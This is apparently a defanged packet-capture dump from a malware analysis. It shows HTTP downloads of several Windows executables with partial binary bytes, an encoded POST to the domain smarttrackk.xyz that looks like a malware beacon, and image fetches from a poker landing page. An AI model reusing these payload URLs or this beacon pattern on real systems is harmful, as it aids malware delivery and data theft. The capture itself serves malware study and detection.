xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.c
om/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Resourc
eRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocument
ID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.di
d:330E3A4C528811E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:330E3A4B
528811E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015 (Wi
ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e406bbd8-b
32b-ad43-b177-c791ebe91eb7" stRef:documentID="adobe:docid:photoshop:84
bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> <
/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..9....=IDATx
..}..%Wu.yU.s..{.'..F3..".d.....l.8...^.].x.....kc/&Y.c..&..`Q..4..&..
........Uo.{U..U........F...~..U..}..{...q..j.......W....i...|.?g\Z.j.
............1m.]..i.....j..m.....juEK...........%4-..j..V..Y.niuEK....
....tKhZ.....u....^............).z[]..j.v......}.%4-..j.....v......qZ.
.-B..h..%4-..j....M.....-..j.o:m.......4N.]x{3m.luC..4N..Z.5.Z..Z..j..
..Vk....Z.....Z..Z..j....Vk....Z.....Z.%8..j....Vk....Z.....Z.%8..j-.i
...V.]...Z..j....m;m.kuEKpZ...B...v#m......Z...1M.X. m.....qZ.....<<< skipped >>>

GET /HNK45/FTGHUIO6/Dance.exe HTTP/1.1

Host: mydownloaddomain.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.10.0 (Ubuntu)

Content-Type: application/x-dosexec

Content-Length: 115200

Connection: keep-alive

Cache-Control: public

Last-Modified: Tue, 26 Sep 2017 12:03:53 GMT

Content-Disposition: attachment; filename="Dance.exe"

Accept-Ranges: bytes

Date: Thu, 28 Sep 2017 03:12:09 GMT

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....@.Y
................................. ... ....@.. ....................... 
............@.....................................K....@..............
................r................................................ ....
........... ..H............text........ ...................... ..`.sda
ta....... ......................@....rsrc........@....................
..@..@.reloc..............................@..B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................H............j....
......................................................n .().p@...&.-.(
p....(.....*.0..T....... .(.5G_...&.-.(p....%(....r...p(..............
..%.r%..p.%.rM..p.%.r...p.%.r...p.%.r...p.%.r...p.%.rQ..p.%.r...p.%.r.
..p.%..r...p.%..r...p.%..r...p.%..r9..p.%..r_..p.%..rs..p.%..r...p.%..
r...p.%..r...p.%..r...p.%..r/..p.%..rK..p.%..ru..p.%..r...p.%..r...p.%
..r...p.%..r...p......r-..p...........%.r...p.%.r...p.%.r...p.%.r...p.
%.r...p......*.0.......... .(z.BX...&.-...~....r...p.o.......o....

<<< skipped >>>

GET /uploads/akil/xx13.exe HTTP/1.1

Host: mydownloaddomain.com


HTTP/1.1 200 OK

Server: nginx/1.10.0 (Ubuntu)

Content-Type: application/x-dosexec

Content-Length: 416256

Connection: keep-alive

Cache-Control: public

Last-Modified: Wed, 27 Sep 2017 12:19:00 GMT

Content-Disposition: attachment; filename="xx13.exe"

Accept-Ranges: bytes

Date: Thu, 28 Sep 2017 03:12:09 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......Y
.................>..........N\... ...`....@.. .....................
...............@..................................\..K.......\........
....................[............................................... .
.............. ..H............text...T<... ...>.................
. ..`.sdata.......`.......B..............@....rsrc...\............F...
...........@..@.reloc...............X..............@..B...............
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................................................0\......H........
a...l......$...~...6...........................................R .(...
@...&.-.~....*...V .(b$.....&.-.......*..R .(.q.8...&.-.~....*...V .(.
d7d...&.-.......*..R .(...=...&.-.~....*...V .(.LO]...&.-.......*..R .
(..HP...&.-.~....*...V .(Z.7<...&.-.......*..R .(...0...&.-.~....*.
..V .(T}.H...&.-.......*..R .(..!9...&.-.~....*...V .(_..a...&.-......
.*..R .(...Z...&.-.~....*...V .(..=O...&.-.......*..n .(?.WD...&.-.(..
...(.....*.0..h....... .(..>5...&.-.(...........%.r...p.%.r'..p<<< skipped >>>

GET /uploads/akil/xx12.exe HTTP/1.1

Host: mydownloaddomain.com


HTTP/1.1 200 OK

Server: nginx/1.10.0 (Ubuntu)

Content-Type: application/x-dosexec

Content-Length: 567808

Connection: keep-alive

Cache-Control: public

Last-Modified: Wed, 27 Sep 2017 12:08:16 GMT

Content-Disposition: attachment; filename="xx12.exe"

Accept-Ranges: bytes

Date: Thu, 28 Sep 2017 03:12:10 GMT

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...G..Y
.................*...|.......I... ...`....@.. ....................... 
............@.................................pI..K........u..........
................"I............................................... ....
........... ..H............text....)... ...*.................. ..`.sda
ta.......`......................@....rsrc....u.......v...2............
..@..@.reloc..............................@..B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.............................................I......H.................
..4....l...............................................0..M....... .(.
G,9...&.-.(....9....(......(...(....9....(..........(..........&......
..*...........5C.......0..(....... .(..Z0...&.-.(....(..........&.....
...*.................0..H....... .(J9GZ...&.-.(......:....(.....(....9
.....(....&8....(....9.....(.....*.0.._....... .(..:Q...&.-..(.....~..
..~....o.......8.....~.........o......X..~.....i?.....o.........&.....
*.........CX.......0..d....... .(s._X...&.-..(.....~....~....o....

<<< skipped >>>

GET /uploads/EmreExe/Recover.exe HTTP/1.1

Host: mydownloaddomain.com


HTTP/1.1 200 OK

Server: nginx/1.10.0 (Ubuntu)

Content-Type: application/x-dosexec

Content-Length: 250880

Connection: keep-alive

Cache-Control: public

Last-Modified: Wed, 27 Sep 2017 12:21:34 GMT

Content-Disposition: attachment; filename="Recover.exe"

Accept-Ranges: bytes

Date: Thu, 28 Sep 2017 03:12:10 GMT

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......Y
................................. ........@.. .......................@
............@.....................................K.... ..4...........
......... ......\................................................ ....
........... ..H............text........ ...................... ..`.sda
ta..............................@....rsrc...4.... ....................
..@..@.reloc....... ......................@..B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................H.......ld..Ny....
....................................................... .(~~^S...&.-.(
.....(.....(.....#........(......(.....(....*...R .(.h)U...&.-.(....*.
...0..B....... .(.y.W...&.-.~....%:....&~..........s....%.....s....%.o
....o....*...0.......... .(...i...&.-.s.......s....}......%(....r...p(
....}......{.......(......(..........9.....o.....(.........&.{....( ..
.s!...%.o"....{....%:....&........s#...%.}.....o$....{....o%...&.~....
........G..R........8.1i.P2.... .(...W...&.-..(&...%%o'... ....`o(

<<< skipped >>>

GET /HNK45/FTGHUIO6/Twerk.exe HTTP/1.1

Host: mydownloaddomain.com


HTTP/1.1 200 OK

Server: nginx/1.10.0 (Ubuntu)

Content-Type: application/x-dosexec

Content-Length: 121344

Connection: keep-alive

Cache-Control: public

Last-Modified: Sat, 23 Sep 2017 00:37:18 GMT

Content-Disposition: attachment; filename="Twerk.exe"

Accept-Ranges: bytes

Date: Thu, 28 Sep 2017 03:12:11 GMT

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...V..Y
................................. ........@.. .......................@
............@.....................................K...................
......... ......t................................................ ....
........... ..H............text........ ...................... ..`.sda
ta..............................@....rsrc.............................
..@..@.reloc....... ......................@..B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................H............O....
.. ...................................................R .(..xi...&.-.~
....*...V .(...W...&.-.......*..j .(k.tA...&.-.(.....(....*..0........
.. .(.I5V...&.-...s....%.o....%.o....% ....o....% ....o....~....(.....
~....(.......o.....s....%..s....(.....o......%......io....o....o....( 
...*...0.......... .(.d.D...&.-.. ....(p... ....(p...o!...&.s....%.o..
..%.o....% ....o....% ....o....~....(.....~....(.......o"....(....%.i.
.....s#.....s........io$...&(.....o%...*..j .(...[...&.-.(.....(..

<<< skipped >>>

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Thu, 28 Sep 2017 03:12:35 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120194, public, no-transform, must-revalidate

Last-Modified: Thu, 28 Sep 2017 02:21:16 GMT

Expires: Fri, 29 Sep 2017 14:21:16 GMT

ETag: "c9d119809ad2c096216a3327e7898a1ae4fbbe38"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1730

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0.....0..1.0...U....US1.0...U....Ari
zona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Dad
dy Root Validation Authority - G2..20170928022116Z0d0b0:0... .........
#o..K......#..... ...:....g(.....An ............20170928022116Z....201
70929142116Z0...*.H...................kw.gzl*..N|YI...........6...|.h.
.a...Y.Iws7...r.\*.9..b.%u.~.p..1.)MY.`..9`..5...j....x......$f ....G.
. 8$>..L...; W.c...k...v(....C..V.2..<qS?..iF....K^..{8........R
j...-..>...........\.D..":".....P....Y.}.0..9..=....AO..]..V....Z(.
s.g....L5..Q$........0...0..~0..f........T|....70...*.H........0..1.0.
..U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com
, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...161213070
000Z..171213070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scotts
dale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Au
thority - G20.."0...*.H.............0.............}...@.H..........j.b
.2.c....'eSA.....6""2.hf.m.m9........_N."gV..{.J"{..0f.W$.Xr....|U.F.!
.K.0 .(p......9.I......c.c\.9.xt.v.UN...%....,R....ZJ......rz.Z..p...r
u.6.....0..t....*...T.W.....?...X...( ..z.[. .A... z.[>-.y>...nv
U...g.wU........ Fh.6F...}.........0..0...U.......0.0...U...........0.
..U.%..0... .......0...U........J!~...}....^].....0... .....0......0@.
.U...90705.3.1./hXXp://crl.godaddy.com/repository/gdroot-g2.crl0J..U. 
.C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0
...*.H.............=......|Q.y.kI$...T@.ff.m...1......\...10..T...<<< skipped >>>

POST /temptrack/Store HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: smarttrackk.xyz

Content-Length: 180

Expect: 100-continue

Accept-Encoding: gzip

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

order="VoKGuJd2ELGGMv059EYoxqZWINs70rPNGd2GTkK3r8YEmtLK2bvAB63xputxkC 
/9Gzf6kcMG8qPhOOL/b3llr2BVFPXaKb8cCgw L8rEc0UflKSlwp8RJgB6 iYCfyyHVZEW
xBWuj3I6/4ocJaJxBSkaX8GS7GwUZgj/U1xsN0="

HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Cache-Control: no-cache

X-RateLimit-Limit: 60

X-RateLimit-Remaining: 59

Date: Thu, 28 Sep 2017 03:12:05 GMT

Content-Encoding: gzip

14........................0..

GET /pokermatch/podarok200/images/logo-pokermatch.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:52 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=db5a0851b0ca3d4d4424694ecd363cf211499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"596646b3-216e"

Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT

CF-Cache-Status: REVALIDATED

Expires: Fri, 13 Jul 2018 05:08:00 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37d9b8cf266d825b-KBP

Cache: HIT

X-Cached-Since: 2017-07-13T05:08:00 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-13T13:12:06 00:00

X-ID: m9-up-e245
216e...PNG........IHDR.......M.............tEXtSoftware.Adobe ImageRea
dyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.c
om/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Resourc
eRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocument
ID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.di
d:09553897527C11E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:09553896
527C11E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015 (Wi
ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:60ed7017-f
2aa-7f4b-a68d-286eb55adbc9" stRef:documentID="adobe:docid:photoshop:84
bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> <
/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>s!y.....IDATx
..].....>.^7.m........fGY\p..qW...0.1AG?wG....i..Q.5.N../f1.'Fc.l..
..* . .6..~.....>)....z.>.f.|.Q.....=.r...J..*..`<...c....e..
.?..3n.....Uv.i..uT.'K......$..:...RAk.%.C).C;.1(......b....Sw.j.S.O`\
....!.......b"u.`...?q;......O.........R.-=.....3~....n...l...AB-Ez>
;.>v\....-..t..u...Nva.'x._f...<,.z...3....E..Q.8..D...H.Z.[...q
..k..0n.x...=......}.=.x...I5/.2.P...q....y..q........:......:.'{.P...
P..f........l..]m..'...@..K.....O.0!.W.a\.........x .#...% .lS..h.<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-4.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dec15e6cee66e6103cf4fa0e28b7212121499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"596646b3-1306"

Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT

CF-Cache-Status: EXPIRED

Expires: Fri, 13 Jul 2018 05:08:00 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37d9b8d0c0b38406-KBP

Cache: HIT

X-Cached-Since: 2017-07-13T05:08:00 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-13T13:12:06 00:00

X-ID: m9-up-e245
1306...PNG........IHDR...K...K.....8Nz.....tEXtSoftware.Adobe ImageRea
dyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com
/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="
hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe
 Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:06F7D5D7529F
11E7BDC0E513E060F7A3" xmpMM:DocumentID="xmp.did:06F7D5D8529F11E7BDC0E5
13E060F7A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:06F7D5
D5529F11E7BDC0E513E060F7A3" stRef:documentID="xmp.did:06F7D5D6529F11E7
BDC0E513E060F7A3"/> </rdf:Description> </rdf:RDF> </
x:xmpmeta> <?xpacket end="r"?>9eE*...tIDATx..\..VE....E./...]
.|....GYF".a*......-..)...Hjbj>......P.....J\.....0H,.g.....u..g..3
g..9s.{q.Yw..93.....g.........1. p&/H.L...3}/.Eyq>...}:O.eu.t.;...@
.... ./.....F.FC.[..C.;....~..o..#f.....-.?f.%y&..4.Yua......U!c.|N.'.
6...._.a$t./..EV..........e.  ......7C....y..<N..qv..D..B.h.U^.P.$.
C..B..`.A.G..N.N..n...x..0... ...`...c....X)............u.wA.cr....R..
......d{..........b0...f..!...k!..U.M.V.....hW.7.~`...b......Y....d).a
A.c...~....u).:E.C..E..].Lm.........t.2..aAY.....W.^.....E.MI.L../.3..
..v#...~G.>........006......I....nJ...Z-I)..*......h..^..3y.._@<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-5.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=da2d33e1487b0d2e2cd36dd4eb22923d41499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"596646b3-602"

Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT

CF-Cache-Status: EXPIRED

Expires: Fri, 13 Jul 2018 05:08:00 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37d9b8d102518243-KBP

Cache: HIT

X-Cached-Since: 2017-07-13T05:08:00 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-13T13:12:04 00:00

X-ID: m9-up-e245
602...PNG........IHDR...A...1.............tEXtSoftware.Adobe ImageRead
yq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M
0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:x
mptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "&
gt; <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#
"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/
xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="h
ttp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe 
Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:58404DAA529F1
1E7BDC0E513E060F7A3" xmpMM:DocumentID="xmp.did:58404DAB529F11E7BDC0E51
3E060F7A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:58404DA
8529F11E7BDC0E513E060F7A3" stRef:documentID="xmp.did:58404DA9529F11E7B
DC0E513E060F7A3"/> </rdf:Description> </rdf:RDF> </x
:xmpmeta> <?xpacket end="r"?>.S.k...pIDATx....KTQ....#.I..|`.
!n.A-..AL`5nt.-..'.V..w.50pa.P..`.d.`..\........$..{. ....8.9.........
.~..9..9.X,F".p.).....H..).~.....qTI....=..G:K.Pp. `.<..~M.G.......
....Af9..v....w.$....s'...........S....x.p.|.7.8g.d.a0a....o..o....J..
..:m.?...r..oB......l..p.,.<F.>.-E;Cd Xc&@dH.<A...Q..9..C.D.=
..5/.....e,`...-.......O..%D.5.u.....u4c....~..dNV.L.....r4....V..F~|.
.._./...v=!1..sp.T.5.. . ..i9T.$....?.~.......q.'<c~.?(.P.... ~m*e,
@,..%.p*....~P.....!......y.Sf7....uY3F!.....(.#...........-{.|`.V*..v
~.m........\.'xN...t.DM~..>.-b.k....Hh?.x.5t.z.5.#6.<?.....U<<< skipped >>>

GET /pokermatch/podarok200/images/f-icon-6.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d5ceb5ab74d0727715778c9259e9d5f3d1499922480; expires=Fri, 13-Jul-18 05:08:00 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"596646b3-bc2"

Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT

CF-Cache-Status: EXPIRED

Expires: Fri, 13 Jul 2018 05:08:00 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37d9b8d112e383f4-KBP

Cache: HIT

X-Cached-Since: 2017-07-13T05:08:00 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-13T13:12:06 00:00

X-ID: m9-up-e245
bc2...PNG........IHDR...X...P........Y....tEXtSoftware.Adobe ImageRead
yq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M
0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:x
mptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "&
gt; <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#
"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/
xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="h
ttp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe 
Photoshop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:58404DAE529F1
1E7BDC0E513E060F7A3" xmpMM:DocumentID="xmp.did:58404DAF529F11E7BDC0E51
3E060F7A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:58404DA
C529F11E7BDC0E513E060F7A3" stRef:documentID="xmp.did:58404DAD529F11E7B
DC0E513E060F7A3"/> </rdf:Description> </rdf:RDF> </x
:xmpmeta> <?xpacket end="r"?> ].....0IDATx..]il.U.><J).
...,e.Q...DqAY." ..`..h...%..HpaQQ".".D\....B....W$..T....dQ...R...g.q
.7......|......|s.s.=wZ.....`....E.c.3..........'.G.'.......ZO..H-$...
.3.$.0/c.....`.3.b~.....<.... p}..v..f ..m/........m..R.C.1a.B.#.C.
...<.k.{.e...)...%..2g1.d.g6...Mf.a..l.g....b.......o.c..n)V..0wK-.
..ep.$...dnc.P.Zi#...(....u.[..`m..E3.}.r..>..G.._.{..=#.G[a_f.... 
...rn..F..!....\ .g...n......~.'.9..;...B...E$....T.f'.L...a...I....9:
.]..x8.....a...y6.1*..=.r..2....]t..U..q..\.}Wb..%`.).........L.`..\..
. \....O<.l.7............_.(.G.......:.2..,..*..9].P.Q.........<<< skipped >>>

GET /pokermatch/podarok200/images/app-windows.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d3954bf174f3a0fccb73ef2ce803e81571499922481; expires=Fri, 13-Jul-18 05:08:01 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"596646b3-2088"

Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT

CF-Cache-Status: EXPIRED

Expires: Fri, 13 Jul 2018 05:08:01 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37d9b8d6b5098219-KBP

Cache: HIT

X-Cached-Since: 2017-07-13T05:08:01 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-13T13:12:06 00:00

X-ID: m9-up-e245
2088...PNG........IHDR.......(.....t2......tEXtSoftware.Adobe ImageRea
dyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.c
om/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Resourc
eRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocument
ID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.di
d:47D831FA52A511E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:58404DB2
529F11E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015 (Wi
ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e406bbd8-b
32b-ad43-b177-c791ebe91eb7" stRef:documentID="adobe:docid:photoshop:84
bfd548-5114-11e7-a192-86375482fcfa"/> </rdf:Description> <
/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.B.}....IDATx
..].TUG.~.x.....(......4q.(..kH.9.[b4.Y.1.Qg.-1..$....Q.N0.Q...n..q.w6
....E....k...<..!:3..:...o........^...8...4..a...i..2.-P...=.A.A..1
.k.........}....z........n..h....1.<...f.2.r.Jo.....R........?L..#.
..9..=@=A.Vz./(....3N;.l....b...P>.p:....../.V;.I..a...y....kQ]]]..
..........=(k..3.~.>d}.F..0...]N....kN...........:.....o.,......P6.
...d..C0Q.0'^...:...hQ...W.IUU.e.........L.b..g....#q..h..SJ..........
.....t....5r.T...;......0C....fW...^{.e!.V...1P.xF...t.....G'...w.<<< skipped >>>

GET /pokermatch/podarok200/images/app-ios.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: imglands1.gcdn.co

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Thu, 28 Sep 2017 03:12:53 GMT

Content-Type: image/png

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d61eea1933a751583ac6a3ad0b29ede021499922482; expires=Fri, 13-Jul-18 05:08:02 GMT; path=/; domain=.gamesforluckers.com; HttpOnly

ETag: W/"596646b3-21b3"

Last-Modified: Wed, 12 Jul 2017 15:56:35 GMT

CF-Cache-Status: EXPIRED

Expires: Fri, 13 Jul 2018 05:08:02 GMT

Cache-Control: public, max-age=31536000

CF-RAY: 37d9b8d9a5828219-KBP

Cache: HIT

X-Cached-Since: 2017-07-13T05:08:02 00:00

X-ID: ix-up-a243

Access-Control-Allow-Origin: *

Cache: HIT

X-Cached-Since: 2017-07-13T13:12:04 00:00

X-ID: m9-up-e245
21b3...PNG........IHDR.......,.............tEXtSoftware.Adobe ImageRea
dyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.c
om/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Resourc
eRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocument
ID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.di
d:4BDD45DD52A611E7BDC0E513E060F7A3" xmpMM:InstanceID="xmp.iid:4BDD45DC
52A611E7BDC0E513E060F7A3" xmp:CreatorTool="Adobe Photoshop CC 2015 (Wi
